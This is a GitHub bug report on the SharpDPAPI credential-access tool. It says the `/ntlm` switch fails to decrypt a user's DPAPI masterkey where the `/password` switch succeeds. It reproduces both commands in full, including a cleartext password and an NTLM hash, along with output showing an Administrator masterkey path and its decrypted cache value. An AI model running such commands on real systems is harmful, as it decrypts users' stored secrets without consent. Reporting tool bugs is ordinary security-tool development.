[BUG] /ntlm switch not working correctly #42

@0xShkk

Using the /ntlm switch, it is not possible to decrypt the user's masterkey, while on the same system, same user, same credentials, it is possible with the cleartext password using the /password switch.

SharpDPAPI.exe masterkeys /password:ActivatorVisel

  __                 _   _       _ ___ 
 (_  |_   _. ._ ._  | \ |_) /\  |_) |  
 __) | | (_| |  |_) |_/ |  /--\ |  _|_ 
                |                      
  v1.12.0                               


[*] Action: User DPAPI Masterkey File Triage

[*] Found MasterKey : C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-34994094-1847292267-723168731-500\d8377558-8284-494f-a0aa-4b62e8f072b7

[*] Preferred master keys:

C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-34994094-1847292267-723168731-500:d8377558-8284-494f-a0aa-4b62e8f072b7

[*] User master key cache:

{d8377558-8284-494f-a0aa-4b62e8f072b7}:06D3269D3E6FA6D90291C8772B548D46A7CBCCE0

SharpDPAPI completed in 00:00:00.2418325

SharpDPAPI.exe masterkeys /ntlm:9CDD174A8CCF28AD8DE61701C58AE077

  __                 _   _       _ ___ 
 (_  |_   _. ._ ._  | \ |_) /\  |_) |  
 __) | | (_| |  |_) |_/ |  /--\ |  _|_ 
                |                      
  v1.12.0                               


[*] Action: User DPAPI Masterkey File Triage

[*] Found MasterKey : C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-34994094-1847292267-723168731-500\d8377558-8284-494f-a0aa-4b62e8f072b7

[*] Preferred master keys:

C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-34994094-1847292267-723168731-500:d8377558-8284-494f-a0aa-4b62e8f072b7

[!] No master keys decrypted!

SharpDPAPI completed in 00:00:00.2446776
